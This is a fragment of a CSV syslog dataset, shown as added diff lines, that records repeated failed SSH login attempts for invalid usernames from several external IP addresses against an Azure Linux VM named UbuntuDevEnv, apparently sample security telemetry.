+5192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:17,UbuntuDevEnv,2019-06-26 15:18:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,20072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:19,UbuntuDevEnv,2019-06-26 15:18:18,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 192.241.213.168 port 43906 ssh2,20072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,192.241.213.1,43906,,
+5194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:19,UbuntuDevEnv,2019-06-26 15:18:19,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 43906:11: Bye Bye [preauth],20072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,43906,,
+5195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:19,UbuntuDevEnv,2019-06-26 15:18:19,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 192.241.213.168 port 43906 [preauth],20072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,192.241.213.1,43906,,
+5196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:52,UbuntuDevEnv,2019-06-26 15:18:52,auth,UbuntuDevEnv,info,Invalid user libsys from 47.254.147.170 port 56944,20198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,libsys,47.254.147.1,56944,,
+5197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:52,UbuntuDevEnv,2019-06-26 15:18:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:52,UbuntuDevEnv,2019-06-26 15:18:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,20198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:55,UbuntuDevEnv,2019-06-26 15:18:54,auth,UbuntuDevEnv,info,Failed password for invalid user libsys from 47.254.147.170 port 56944 ssh2,20198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,libsys,47.254.147.1,56944,,
+5200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:55,UbuntuDevEnv,2019-06-26 15:18:54,auth,UbuntuDevEnv,info,Disconnected from invalid user libsys 47.254.147.170 port 56944 [preauth],20198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,libsys,47.254.147.1,56944,,
+5201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:18:55,UbuntuDevEnv,2019-06-26 15:18:54,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 56944:11: Bye Bye [preauth],20198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,56944,,
+5202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:21,UbuntuDevEnv,2019-06-26 15:20:20,auth,UbuntuDevEnv,info,Invalid user debian from 192.241.213.168 port 60628,20499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debian,192.241.213.1,60628,,
+5203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:21,UbuntuDevEnv,2019-06-26 15:20:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,20499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:21,UbuntuDevEnv,2019-06-26 15:20:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:22,UbuntuDevEnv,2019-06-26 15:20:22,auth,UbuntuDevEnv,info,Failed password for invalid user debian from 192.241.213.168 port 60628 ssh2,20499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debian,192.241.213.1,60628,,
+5206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:22,UbuntuDevEnv,2019-06-26 15:20:22,auth,UbuntuDevEnv,info,Disconnected from invalid user debian 192.241.213.168 port 60628 [preauth],20499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debian,192.241.213.1,60628,,
+5207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:22,UbuntuDevEnv,2019-06-26 15:20:22,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 60628:11: Bye Bye [preauth],20499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,60628,,
+5208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:28,UbuntuDevEnv,2019-06-26 15:20:27,auth,UbuntuDevEnv,info,Invalid user tracy from 47.254.147.170 port 46094,20540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tracy,47.254.147.1,46094,,
+5209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:28,UbuntuDevEnv,2019-06-26 15:20:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,20540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:28,UbuntuDevEnv,2019-06-26 15:20:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:30,UbuntuDevEnv,2019-06-26 15:20:29,auth,UbuntuDevEnv,info,Failed password for invalid user tracy from 47.254.147.170 port 46094 ssh2,20540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tracy,47.254.147.1,46094,,
+5212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:30,UbuntuDevEnv,2019-06-26 15:20:29,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 46094:11: Bye Bye [preauth],20540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,46094,,
+5213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:20:30,UbuntuDevEnv,2019-06-26 15:20:29,auth,UbuntuDevEnv,info,Disconnected from invalid user tracy 47.254.147.170 port 46094 [preauth],20540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tracy,47.254.147.1,46094,,
+5214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:21:56,UbuntuDevEnv,2019-06-26 15:21:55,auth,UbuntuDevEnv,info,Invalid user gao from 47.254.147.170 port 35288,21180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gao,47.254.147.1,35288,,
+5215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:21:56,UbuntuDevEnv,2019-06-26 15:21:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,21180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:21:56,UbuntuDevEnv,2019-06-26 15:21:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,21180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:21:57,UbuntuDevEnv,2019-06-26 15:21:57,auth,UbuntuDevEnv,info,Failed password for invalid user gao from 47.254.147.170 port 35288 ssh2,21180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gao,47.254.147.1,35288,,
+5218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:21:57,UbuntuDevEnv,2019-06-26 15:21:57,auth,UbuntuDevEnv,info,Disconnected from invalid user gao 47.254.147.170 port 35288 [preauth],21180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gao,47.254.147.1,35288,,
+5219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:21:57,UbuntuDevEnv,2019-06-26 15:21:57,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 35288:11: Bye Bye [preauth],21180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,35288,,
+5220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:13,UbuntuDevEnv,2019-06-26 15:22:12,auth,UbuntuDevEnv,info,Invalid user andrew from 192.241.213.168 port 49116,21281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andrew,192.241.213.1,49116,,
+5221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:13,UbuntuDevEnv,2019-06-26 15:22:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,21281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:13,UbuntuDevEnv,2019-06-26 15:22:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,21281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:15,UbuntuDevEnv,2019-06-26 15:22:15,auth,UbuntuDevEnv,info,Failed password for invalid user andrew from 192.241.213.168 port 49116 ssh2,21281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andrew,192.241.213.1,49116,,
+5224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:15,UbuntuDevEnv,2019-06-26 15:22:15,auth,UbuntuDevEnv,info,Disconnected from invalid user andrew 192.241.213.168 port 49116 [preauth],21281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andrew,192.241.213.1,49116,,
+5225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:15,UbuntuDevEnv,2019-06-26 15:22:15,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 49116:11: Bye Bye [preauth],21281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,49116,,
+5226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:38,UbuntuDevEnv,2019-06-26 15:22:37,auth,UbuntuDevEnv,info,Invalid user user from 200.60.91.42 port 55436,21378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,200.60.91.4,55436,,
+5227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:38,UbuntuDevEnv,2019-06-26 15:22:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,21378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:38,UbuntuDevEnv,2019-06-26 15:22:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.60.91.42,21378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.60.91.4,,0,
+5229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:40,UbuntuDevEnv,2019-06-26 15:22:39,auth,UbuntuDevEnv,info,Failed password for invalid user user from 200.60.91.42 port 55436 ssh2,21378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,200.60.91.4,55436,,
+5230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:40,UbuntuDevEnv,2019-06-26 15:22:40,auth,UbuntuDevEnv,info,Disconnected from invalid user user 200.60.91.42 port 55436 [preauth],21378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,200.60.91.4,55436,,
+5231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:22:40,UbuntuDevEnv,2019-06-26 15:22:40,auth,UbuntuDevEnv,info,"Received disconnect from 200.60.91.42 port 55436:11: Normal Shutdown, Thank you for playing [preauth]",21378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.60.91.4,55436,,
+5232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:23:24,UbuntuDevEnv,2019-06-26 15:23:24,auth,UbuntuDevEnv,info,Invalid user postgres01 from 47.254.147.170 port 52686,21546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres01,47.254.147.1,52686,,
+5233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:23:24,UbuntuDevEnv,2019-06-26 15:23:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,21546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:23:24,UbuntuDevEnv,2019-06-26 15:23:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,21546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:23:26,UbuntuDevEnv,2019-06-26 15:23:25,auth,UbuntuDevEnv,info,Failed password for invalid user postgres01 from 47.254.147.170 port 52686 ssh2,21546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres01,47.254.147.1,52686,,
+5236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:23:26,UbuntuDevEnv,2019-06-26 15:23:25,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 52686:11: Bye Bye [preauth],21546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,52686,,
+5237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:23:26,UbuntuDevEnv,2019-06-26 15:23:25,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres01 47.254.147.170 port 52686 [preauth],21546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres01,47.254.147.1,52686,,
+5238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:01,UbuntuDevEnv,2019-06-26 15:24:00,auth,UbuntuDevEnv,info,Invalid user cheng from 192.241.213.168 port 37606,21665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cheng,192.241.213.1,37606,,
+5239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:01,UbuntuDevEnv,2019-06-26 15:24:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,21665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:01,UbuntuDevEnv,2019-06-26 15:24:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,21665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:03,UbuntuDevEnv,2019-06-26 15:24:02,auth,UbuntuDevEnv,info,Failed password for invalid user cheng from 192.241.213.168 port 37606 ssh2,21665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cheng,192.241.213.1,37606,,
+5242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:03,UbuntuDevEnv,2019-06-26 15:24:02,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 37606:11: Bye Bye [preauth],21665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,37606,,
+5243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:03,UbuntuDevEnv,2019-06-26 15:24:02,auth,UbuntuDevEnv,info,Disconnected from invalid user cheng 192.241.213.168 port 37606 [preauth],21665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cheng,192.241.213.1,37606,,
+5244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:55,UbuntuDevEnv,2019-06-26 15:24:55,auth,UbuntuDevEnv,info,Invalid user user from 47.254.147.170 port 41874,21862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,47.254.147.1,41874,,
+5245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:55,UbuntuDevEnv,2019-06-26 15:24:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,21862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:55,UbuntuDevEnv,2019-06-26 15:24:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,21862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:58,UbuntuDevEnv,2019-06-26 15:24:57,auth,UbuntuDevEnv,info,Failed password for invalid user user from 47.254.147.170 port 41874 ssh2,21862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,47.254.147.1,41874,,
+5248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:58,UbuntuDevEnv,2019-06-26 15:24:57,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 41874:11: Bye Bye [preauth],21862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,41874,,
+5249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:24:58,UbuntuDevEnv,2019-06-26 15:24:57,auth,UbuntuDevEnv,info,Disconnected from invalid user user 47.254.147.170 port 41874 [preauth],21862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,47.254.147.1,41874,,
+5250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:25:49,UbuntuDevEnv,2019-06-26 15:25:49,auth,UbuntuDevEnv,info,Invalid user vps from 192.241.213.168 port 54328,22052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,192.241.213.1,54328,,
+5251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:25:49,UbuntuDevEnv,2019-06-26 15:25:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,22052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
